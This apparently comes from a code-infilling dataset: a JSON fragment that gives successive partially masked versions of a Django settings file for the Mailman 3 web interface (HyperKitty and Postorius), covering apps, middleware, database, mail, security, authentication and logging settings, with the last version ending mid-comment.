"step-2": "<mask token>\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option\n ) else None\n return get(section, option) if section else get\n\n\n<mask token>\nif 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:\n import ldap\n from django_auth_ldap.config import LDAPSearch\n ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')\n AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'\n AUTH_LDAP_USER_SEARCH = LDAPSearch('ou=People,dc=example,dc=org', ldap.\n SCOPE_SUBTREE, '(&(mail=*)(uid=%(user)s))')\n AUTH_LDAP_USER_ATTR_MAP = {'first_name': 'givenName', 'last_name': 'sn',\n 'email': 'mail'}\n<mask token>\nif 'raven.contrib.django.raven_compat' in INSTALLED_APPS:\n RAVEN_CONFIG = {'dsn': 'https://<key>:<secret>@sentry.io/<project>'}\n LOGGING['handlers']['sentry'] = {'level': 'ERROR', 'class':\n 'raven.contrib.django.raven_compat.handlers.SentryHandler'}\n LOGGING['loggers']['root']['handlers'].append('sentry')\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n",
"step-3": "<mask token>\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option\n ) else None\n return get(section, option) if section else get\n\n\nmailman_cfg = read_cfg('/etc/mailman.cfg')\nBASE_DIR = '/usr/lib/bundles/mailman-webui'\nCONF_DIR = '/etc/mailman-webui'\nDATA_DIR = '/var/lib/mailman-webui'\nLOG_DIR = '/var/log/mailman-webui'\nALLOWED_HOSTS = ['localhost']\nMAILMAN_REST_API_URL = 'http://localhost:%s' % (mailman_cfg('webservice',\n 'port') or 8001)\nMAILMAN_REST_API_USER = mailman_cfg('webservice', 'admin_user') or 'restadmin'\nMAILMAN_REST_API_PASS = mailman_cfg('webservice', 'admin_pass')\nMAILMAN_ARCHIVER_KEY = read_cfg('/etc/mailman.d/hyperkitty.cfg', 'general',\n 'api_key')\nMAILMAN_ARCHIVER_FROM = '127.0.0.1', '::1', '::ffff:127.0.0.1'\nREST_FRAMEWORK = {'PAGE_SIZE': 10}\nFILTER_VHOST = False\nSITE_ID = 1\nINSTALLED_APPS = ('django.contrib.admin', 'django.contrib.auth',\n 'django.contrib.contenttypes', 'django.contrib.sessions',\n 'django.contrib.sites', 'django.contrib.messages',\n 'django.contrib.staticfiles', 'hyperkitty', 'rest_framework',\n 'django_gravatar', 'paintstore', 'compressor', 'haystack',\n 'django_extensions', 'postorius', 'django_mailman3', 'stronghold',\n 'allauth', 'allauth.account', 'allauth.socialaccount')\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django_mailman3.middleware.TimezoneMiddleware',\n 'postorius.middleware.PostoriusMiddleware')\nROOT_URLCONF = 'urls'\nTEMPLATES = [{'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [joinpath(DATA_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS':\n {'context_processors': ['django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.csrf',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django_mailman3.context_processors.common',\n 'hyperkitty.context_processors.common',\n 'postorius.context_processors.postorius']}}]\nWSGI_APPLICATION = 'wsgi.application'\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME':\n joinpath(DATA_DIR, 'db.sqlite3')}}\nHAYSTACK_CONNECTIONS = {'default': {'ENGINE':\n 'haystack.backends.whoosh_backend.WhooshEngine', 'PATH': joinpath(\n DATA_DIR, 'fulltext_index')}}\nEMAIL_HOST = mailman_cfg('mta', 'smtp_host') or 'localhost'\nEMAIL_PORT = int(mailman_cfg('mta', 'smtp_port') or 25)\nEMAIL_HOST_USER = mailman_cfg('mta', 'smtp_user') or ''\nEMAIL_HOST_PASSWORD = mailman_cfg('mta', 'smtp_pass') or ''\nEMAIL_USE_TLS = False\nEMAIL_USE_SSL = False\nADMINS = ('Mailman Admin', 'root@localhost'),\nSECRET_KEY = open(joinpath(CONF_DIR, 'secret_key')).read()\nCSRF_COOKIE_SECURE = True\nCSRF_COOKIE_HTTPONLY = 
True\nSESSION_COOKIE_SECURE = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_BROWSER_XSS_FILTER = True\nX_FRAME_OPTIONS = 'DENY'\nUSE_X_FORWARDED_HOST = True\nSECURE_PROXY_SSL_HEADER = 'HTTP_X_FORWARDED_PROTO', 'https'\nAUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend')\nLOGIN_URL = 'account_login'\nLOGIN_REDIRECT_URL = 'hk_root'\nLOGOUT_URL = 'account_logout'\nREGISTRATION_OPEN = True\nAUTH_PASSWORD_VALIDATORS = [{'NAME':\n 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'\n }, {'NAME':\n 'django.contrib.auth.password_validation.MinimumLengthValidator'}, {\n 'NAME':\n 'django.contrib.auth.password_validation.CommonPasswordValidator'}, {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'}\n ]\nSTRONGHOLD_PUBLIC_URLS = '^/accounts/.*', '^/archives/api/mailman/.*'\nACCOUNT_ADAPTER = 'custom.CloseableRegistrationAccountAdapter'\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_LOGOUT_ON_GET = False\nSOCIALACCOUNT_PROVIDERS = {}\nif 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:\n import ldap\n from django_auth_ldap.config import LDAPSearch\n ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')\n AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'\n AUTH_LDAP_USER_SEARCH = LDAPSearch('ou=People,dc=example,dc=org', ldap.\n SCOPE_SUBTREE, '(&(mail=*)(uid=%(user)s))')\n AUTH_LDAP_USER_ATTR_MAP = {'first_name': 'givenName', 'last_name': 'sn',\n 'email': 'mail'}\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_ROOT = joinpath(BASE_DIR, 'static')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder')\nCOMPRESS_OFFLINE = True\n<mask token>\nMESSAGE_TAGS = {messages.ERROR: 'danger'}\nGRAVATAR_URL = 'http://cdn.libravatar.org/'\nGRAVATAR_SECURE_URL = 'https://seccdn.libravatar.org/'\nGRAVATAR_DEFAULT_IMAGE = 'retro'\nGRAVATAR_DEFAULT_SECURE = True\nLOGGING = {'version': 1, 'disable_existing_loggers': False, 'filters': {\n 'require_debug_false': {'()': 'django.utils.log.RequireDebugFalse'}},\n 'handlers': {'console': {'class': 'logging.StreamHandler', 'formatter':\n 'simple'}, 'file': {'level': 'INFO', 'class':\n 'logging.handlers.WatchedFileHandler', 'filename': joinpath(LOG_DIR,\n 'mailman-webui.log'), 'formatter': 'verbose'}, 'mail_admins': {'level':\n 'ERROR', 'filters': ['require_debug_false'], 'class':\n 'django.utils.log.AdminEmailHandler'}}, 'loggers': {'django.request': {\n 'handlers': ['file'], 'level': 'ERROR', 'propagate': True}, 'django': {\n 'handlers': ['file'], 'level': 'ERROR', 'propagate': True}, 'postorius':\n {'handlers': ['file'], 'level': 'INFO', 'propagate': True},\n 'hyperkitty': {'handlers': ['file'], 'level': 'INFO', 'propagate': True\n }}, 'formatters': {'verbose': {'format':\n '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n }, 'simple': {'format': '%(levelname)s %(message)s'}}, 'root': {\n 'handlers': ['file'], 'level': 'INFO'}}\nif 'raven.contrib.django.raven_compat' in INSTALLED_APPS:\n RAVEN_CONFIG = {'dsn': 'https://<key>:<secret>@sentry.io/<project>'}\n LOGGING['handlers']['sentry'] = {'level': 'ERROR', 'class':\n 
'raven.contrib.django.raven_compat.handlers.SentryHandler'}\n LOGGING['loggers']['root']['handlers'].append('sentry')\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n",
"step-4": "<mask token>\nfrom os.path import abspath, dirname, join as joinpath\nfrom ConfigParser import SafeConfigParser\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option\n ) else None\n return get(section, option) if section else get\n\n\nmailman_cfg = read_cfg('/etc/mailman.cfg')\nBASE_DIR = '/usr/lib/bundles/mailman-webui'\nCONF_DIR = '/etc/mailman-webui'\nDATA_DIR = '/var/lib/mailman-webui'\nLOG_DIR = '/var/log/mailman-webui'\nALLOWED_HOSTS = ['localhost']\nMAILMAN_REST_API_URL = 'http://localhost:%s' % (mailman_cfg('webservice',\n 'port') or 8001)\nMAILMAN_REST_API_USER = mailman_cfg('webservice', 'admin_user') or 'restadmin'\nMAILMAN_REST_API_PASS = mailman_cfg('webservice', 'admin_pass')\nMAILMAN_ARCHIVER_KEY = read_cfg('/etc/mailman.d/hyperkitty.cfg', 'general',\n 'api_key')\nMAILMAN_ARCHIVER_FROM = '127.0.0.1', '::1', '::ffff:127.0.0.1'\nREST_FRAMEWORK = {'PAGE_SIZE': 10}\nFILTER_VHOST = False\nSITE_ID = 1\nINSTALLED_APPS = ('django.contrib.admin', 'django.contrib.auth',\n 'django.contrib.contenttypes', 'django.contrib.sessions',\n 'django.contrib.sites', 'django.contrib.messages',\n 'django.contrib.staticfiles', 'hyperkitty', 'rest_framework',\n 'django_gravatar', 'paintstore', 'compressor', 'haystack',\n 'django_extensions', 'postorius', 'django_mailman3', 'stronghold',\n 'allauth', 'allauth.account', 'allauth.socialaccount')\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django_mailman3.middleware.TimezoneMiddleware',\n 'postorius.middleware.PostoriusMiddleware')\nROOT_URLCONF = 'urls'\nTEMPLATES = [{'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [joinpath(DATA_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS':\n {'context_processors': ['django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.csrf',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django_mailman3.context_processors.common',\n 'hyperkitty.context_processors.common',\n 'postorius.context_processors.postorius']}}]\nWSGI_APPLICATION = 'wsgi.application'\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME':\n joinpath(DATA_DIR, 'db.sqlite3')}}\nHAYSTACK_CONNECTIONS = {'default': {'ENGINE':\n 'haystack.backends.whoosh_backend.WhooshEngine', 'PATH': joinpath(\n DATA_DIR, 'fulltext_index')}}\nEMAIL_HOST = mailman_cfg('mta', 'smtp_host') or 'localhost'\nEMAIL_PORT = int(mailman_cfg('mta', 'smtp_port') or 25)\nEMAIL_HOST_USER = mailman_cfg('mta', 'smtp_user') or ''\nEMAIL_HOST_PASSWORD = mailman_cfg('mta', 'smtp_pass') or ''\nEMAIL_USE_TLS = False\nEMAIL_USE_SSL = False\nADMINS = ('Mailman Admin', 'root@localhost'),\nSECRET_KEY = 
open(joinpath(CONF_DIR, 'secret_key')).read()\nCSRF_COOKIE_SECURE = True\nCSRF_COOKIE_HTTPONLY = True\nSESSION_COOKIE_SECURE = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_BROWSER_XSS_FILTER = True\nX_FRAME_OPTIONS = 'DENY'\nUSE_X_FORWARDED_HOST = True\nSECURE_PROXY_SSL_HEADER = 'HTTP_X_FORWARDED_PROTO', 'https'\nAUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend')\nLOGIN_URL = 'account_login'\nLOGIN_REDIRECT_URL = 'hk_root'\nLOGOUT_URL = 'account_logout'\nREGISTRATION_OPEN = True\nAUTH_PASSWORD_VALIDATORS = [{'NAME':\n 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'\n }, {'NAME':\n 'django.contrib.auth.password_validation.MinimumLengthValidator'}, {\n 'NAME':\n 'django.contrib.auth.password_validation.CommonPasswordValidator'}, {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'}\n ]\nSTRONGHOLD_PUBLIC_URLS = '^/accounts/.*', '^/archives/api/mailman/.*'\nACCOUNT_ADAPTER = 'custom.CloseableRegistrationAccountAdapter'\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_LOGOUT_ON_GET = False\nSOCIALACCOUNT_PROVIDERS = {}\nif 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:\n import ldap\n from django_auth_ldap.config import LDAPSearch\n ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')\n AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'\n AUTH_LDAP_USER_SEARCH = LDAPSearch('ou=People,dc=example,dc=org', ldap.\n SCOPE_SUBTREE, '(&(mail=*)(uid=%(user)s))')\n AUTH_LDAP_USER_ATTR_MAP = {'first_name': 'givenName', 'last_name': 'sn',\n 'email': 'mail'}\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_ROOT = joinpath(BASE_DIR, 'static')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder')\nCOMPRESS_OFFLINE = True\nfrom django.contrib.messages import constants as messages\nMESSAGE_TAGS = {messages.ERROR: 'danger'}\nGRAVATAR_URL = 'http://cdn.libravatar.org/'\nGRAVATAR_SECURE_URL = 'https://seccdn.libravatar.org/'\nGRAVATAR_DEFAULT_IMAGE = 'retro'\nGRAVATAR_DEFAULT_SECURE = True\nLOGGING = {'version': 1, 'disable_existing_loggers': False, 'filters': {\n 'require_debug_false': {'()': 'django.utils.log.RequireDebugFalse'}},\n 'handlers': {'console': {'class': 'logging.StreamHandler', 'formatter':\n 'simple'}, 'file': {'level': 'INFO', 'class':\n 'logging.handlers.WatchedFileHandler', 'filename': joinpath(LOG_DIR,\n 'mailman-webui.log'), 'formatter': 'verbose'}, 'mail_admins': {'level':\n 'ERROR', 'filters': ['require_debug_false'], 'class':\n 'django.utils.log.AdminEmailHandler'}}, 'loggers': {'django.request': {\n 'handlers': ['file'], 'level': 'ERROR', 'propagate': True}, 'django': {\n 'handlers': ['file'], 'level': 'ERROR', 'propagate': True}, 'postorius':\n {'handlers': ['file'], 'level': 'INFO', 'propagate': True},\n 'hyperkitty': {'handlers': ['file'], 'level': 'INFO', 'propagate': True\n }}, 'formatters': {'verbose': {'format':\n '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n }, 'simple': {'format': '%(levelname)s %(message)s'}}, 'root': {\n 'handlers': ['file'], 'level': 'INFO'}}\nif 'raven.contrib.django.raven_compat' in INSTALLED_APPS:\n 
RAVEN_CONFIG = {'dsn': 'https://<key>:<secret>@sentry.io/<project>'}\n LOGGING['handlers']['sentry'] = {'level': 'ERROR', 'class':\n 'raven.contrib.django.raven_compat.handlers.SentryHandler'}\n LOGGING['loggers']['root']['handlers'].append('sentry')\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n",
"step-5": "#-*- coding: utf-8 -*-\n\"\"\"\nDjango settings for HyperKitty + Postorius\n\nPay attention to settings ALLOWED_HOSTS and DATABASES!\n\"\"\"\nfrom os.path import abspath, dirname, join as joinpath\nfrom ConfigParser import SafeConfigParser\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option) else None\n return get(section, option) if section else get\n\nmailman_cfg = read_cfg('/etc/mailman.cfg')\n\n\nBASE_DIR = '/usr/lib/bundles/mailman-webui'\nCONF_DIR = '/etc/mailman-webui'\nDATA_DIR = '/var/lib/mailman-webui'\nLOG_DIR = '/var/log/mailman-webui'\n\n# Hosts/domain names that are valid for this site.\n# NOTE: You MUST add domain name of your instance of this application here!\n# See https://docs.djangoproject.com/en/1.9/ref/settings/#allowed-hosts\nALLOWED_HOSTS = ['localhost']\n\n# Mailman API credentials\n# NOTE: Replace with hard-coded values if Mailman is running on a different host.\nMAILMAN_REST_API_URL = 'http://localhost:%s' % (mailman_cfg('webservice', 'port') or 8001)\nMAILMAN_REST_API_USER = mailman_cfg('webservice', 'admin_user') or 'restadmin'\nMAILMAN_REST_API_PASS = mailman_cfg('webservice', 'admin_pass')\nMAILMAN_ARCHIVER_KEY = read_cfg('/etc/mailman.d/hyperkitty.cfg', 'general', 'api_key')\nMAILMAN_ARCHIVER_FROM = ('127.0.0.1', '::1', '::ffff:127.0.0.1')\n\n# REST API\nREST_FRAMEWORK = {\n 'PAGE_SIZE': 10,\n}\n\n# Only display mailing-lists in HyperKitty from the same virtual host\n# as the webserver.\nFILTER_VHOST = False\n\n\n#\n# Application definition\n#\n\nSITE_ID = 1\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'hyperkitty',\n 'rest_framework',\n 'django_gravatar',\n 'paintstore',\n 'compressor',\n 'haystack',\n 'django_extensions',\n 'postorius',\n 'django_mailman3',\n 'stronghold',\n\n # Uncomment the next line to enable integration with Sentry\n # and set DSN in RAVEN_CONFIG.\n #'raven.contrib.django.raven_compat',\n\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n # Uncomment providers that you want to use, if any.\n #'allauth.socialaccount.providers.openid',\n #'allauth.socialaccount.providers.github',\n #'allauth.socialaccount.providers.gitlab',\n #'allauth.socialaccount.providers.google',\n #'allauth.socialaccount.providers.twitter',\n #'allauth.socialaccount.providers.stackexchange',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django_mailman3.middleware.TimezoneMiddleware',\n 'postorius.middleware.PostoriusMiddleware',\n\n # Uncomment to require a user to be authenticated to view any page.\n #'stronghold.middleware.LoginRequiredMiddleware',\n)\n\n# A string representing the full Python import path to your root URLconf.\nROOT_URLCONF = 'urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 
'DIRS': [\n # Directory for templates override.\n joinpath(DATA_DIR, 'templates'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.csrf',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django_mailman3.context_processors.common',\n 'hyperkitty.context_processors.common',\n 'postorius.context_processors.postorius',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'wsgi.application'\n\n# Using the cache infrastructure can significantly improve performance on a\n# production setup. This is an example with a local Memcached server.\n#CACHES = {\n# 'default': {\n# 'BACKEND': 'django.core.cache.backends.memcached.PyLibMCCache',\n# 'LOCATION': '127.0.0.1:11211',\n# }\n#}\n\n\n#\n# Databases\n# See https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n#\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': joinpath(DATA_DIR, 'db.sqlite3'),\n }\n# Remove the above lines and uncomment the below to use PostgreSQL.\n# 'default': {\n# 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n# 'NAME': 'mailman_webui',\n# 'USER': 'mailman_webui',\n# 'PASSWORD': 'change-me',\n# # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.\n# 'HOST': '127.0.0.1',\n# 'PORT': '',\n# }\n}\n\n# Full-text search engine\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',\n 'PATH': joinpath(DATA_DIR, 'fulltext_index'),\n },\n}\n\n\n#\n# Outgoing mails\n#\n\n# NOTE: Replace with hard-coded values if Mailman is running on a different host.\n\n# The host and port of the SMTP server to use for sending email.\nEMAIL_HOST = mailman_cfg('mta', 'smtp_host') or 'localhost'\nEMAIL_PORT = int(mailman_cfg('mta', 'smtp_port') or 25)\n\n# Username and password to use for the SMTP server defined above.\nEMAIL_HOST_USER = mailman_cfg('mta', 'smtp_user') or ''\nEMAIL_HOST_PASSWORD = mailman_cfg('mta', 'smtp_pass') or ''\n\n# Whether to use a explicit TLS connection when talking to the SMTP server.\nEMAIL_USE_TLS = False\n\n# Whether to use an implicit TLS connection when talking to the SMTP server.\nEMAIL_USE_SSL = False\n\n# A tuple that lists people who get code error notifications. When DEBUG=False\n# and a view raises an exception, Django will email these people with the full\n# exception information. Each member of the tuple should be a tuple of (Full\n# name, email address).\nADMINS = (\n ('Mailman Admin', 'root@localhost'),\n)\n\n# If you enable email reporting for error messages, this is where those emails\n# will appear to be coming from. Make sure you set a valid domain name,\n# otherwise the emails may get rejected.\n# https://docs.djangoproject.com/en/1.9/ref/settings/#std:setting-SERVER_EMAIL\n#SERVER_EMAIL = '[email protected]'\n\n# If you enable internal authentication, this is the address that the emails\n# will appear to be coming from. 
Make sure you set a valid domain name,\n# otherwise the emails may get rejected.\n# https://docs.djangoproject.com/en/1.9/ref/settings/#default-from-email\n#DEFAULT_FROM_EMAIL = '[email protected]'\n\n\n#\n# Security settings\n#\n\n# A secret key used for signing sessions, cookies, password reset tokens etc.\nSECRET_KEY = open(joinpath(CONF_DIR, 'secret_key')).read()\n\nCSRF_COOKIE_SECURE = True\nCSRF_COOKIE_HTTPONLY = True\nSESSION_COOKIE_SECURE = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_BROWSER_XSS_FILTER = True\nX_FRAME_OPTIONS = 'DENY'\n\n# If you're behind a proxy, use the X-Forwarded-Host header\n# See https://docs.djangoproject.com/en/1.9/ref/settings/#use-x-forwarded-host\nUSE_X_FORWARDED_HOST = True\n\n# And if your proxy does your SSL encoding for you, set SECURE_PROXY_SSL_HEADER\n# https://docs.djangoproject.com/en/1.9/ref/settings/#secure-proxy-ssl-header\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n#SECURE_SSL_REDIRECT = True\n\n# If you set SECURE_SSL_REDIRECT to True, make sure the SECURE_REDIRECT_EXEMPT\n# contains at least this line:\n#SECURE_REDIRECT_EXEMPT = [\n# 'archives/api/mailman/.*', # Request from Mailman.\n#]\n\n\n#\n# Authentication\n#\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n # Uncomment to next line to enable LDAP authentication.\n #'custom.LDAPBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n\nLOGIN_URL = 'account_login'\nLOGIN_REDIRECT_URL = 'hk_root'\nLOGOUT_URL = 'account_logout'\n\n# Whether registration of new accounts is currently permitted.\nREGISTRATION_OPEN = True\n\n# Password validation\n# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators\nAUTH_PASSWORD_VALIDATORS = [\n { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator' },\n { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator' },\n { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator' },\n { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator' },\n]\n\n# URLs which are ignored by LoginRequiredMiddleware, i.e. 
the middleware\n# does not *force* them to require authentication.\nSTRONGHOLD_PUBLIC_URLS = (\n r'^/accounts/.*',\n r'^/archives/api/mailman/.*',\n)\n\n## Django Allauth\n\n# Custom AccountAdapter for allauth that respects REGISTRATION_OPEN variable.\nACCOUNT_ADAPTER = 'custom.CloseableRegistrationAccountAdapter'\n\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'\nACCOUNT_UNIQUE_EMAIL = True\n\n# Whether to disable intermediate logout page.\nACCOUNT_LOGOUT_ON_GET = False\n\nSOCIALACCOUNT_PROVIDERS = {}\n#SOCIALACCOUNT_PROVIDERS = {\n# 'openid': {\n# 'SERVERS': [\n# {\n# 'id': 'yahoo',\n# 'name': 'Yahoo',\n# 'openid_url': 'http://me.yahoo.com'\n# }\n# ],\n# },\n# 'google': {\n# 'SCOPE': ['profile', 'email'],\n# 'AUTH_PARAMS': {'access_type': 'online'},\n# },\n# 'facebook': {\n# 'METHOD': 'oauth2',\n# 'SCOPE': ['email'],\n# 'FIELDS': [\n# 'email',\n# 'name',\n# 'first_name',\n# 'last_name',\n# 'locale',\n# 'timezone',\n# ],\n# 'VERSION': 'v2.4',\n# },\n#}\n\n## Django LDAP\nif 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:\n import ldap\n from django_auth_ldap.config import LDAPSearch\n\n ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')\n\n AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'\n\n AUTH_LDAP_USER_SEARCH = LDAPSearch(\n 'ou=People,dc=example,dc=org',\n ldap.SCOPE_SUBTREE,\n '(&(mail=*)(uid=%(user)s))'\n )\n\n AUTH_LDAP_USER_ATTR_MAP = {\n 'first_name': 'givenName',\n 'last_name': 'sn',\n 'email': 'mail',\n }\n\n\n#\n# Internationalization\n# https://docs.djangoproject.com/en/1.9/topics/i18n/\n#\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n\n#\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.9/howto/static-files/\n#\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/var/www/example.com/static/\"\nSTATIC_ROOT = joinpath(BASE_DIR, 'static')\n\n# URL prefix for static files.\n# Example: \"http://example.com/static/\", \"http://static.example.com/\"\nSTATIC_URL = '/static/'\n\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\".\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\n# django-compressor\nCOMPRESS_OFFLINE = True\n\n# Compatibility with Bootstrap 3\nfrom django.contrib.messages import constants as messages\nMESSAGE_TAGS = {\n messages.ERROR: 'danger'\n}\n\n\n#\n# Gravatar\n# https://github.com/twaddington/django-gravatar\n#\n\n# Gravatar base url.\nGRAVATAR_URL = 'http://cdn.libravatar.org/'\n# Gravatar base secure https url.\nGRAVATAR_SECURE_URL = 'https://seccdn.libravatar.org/'\n# Gravatar size in pixels.\n#GRAVATAR_DEFAULT_SIZE = '80'\n# An image url or one of the following: 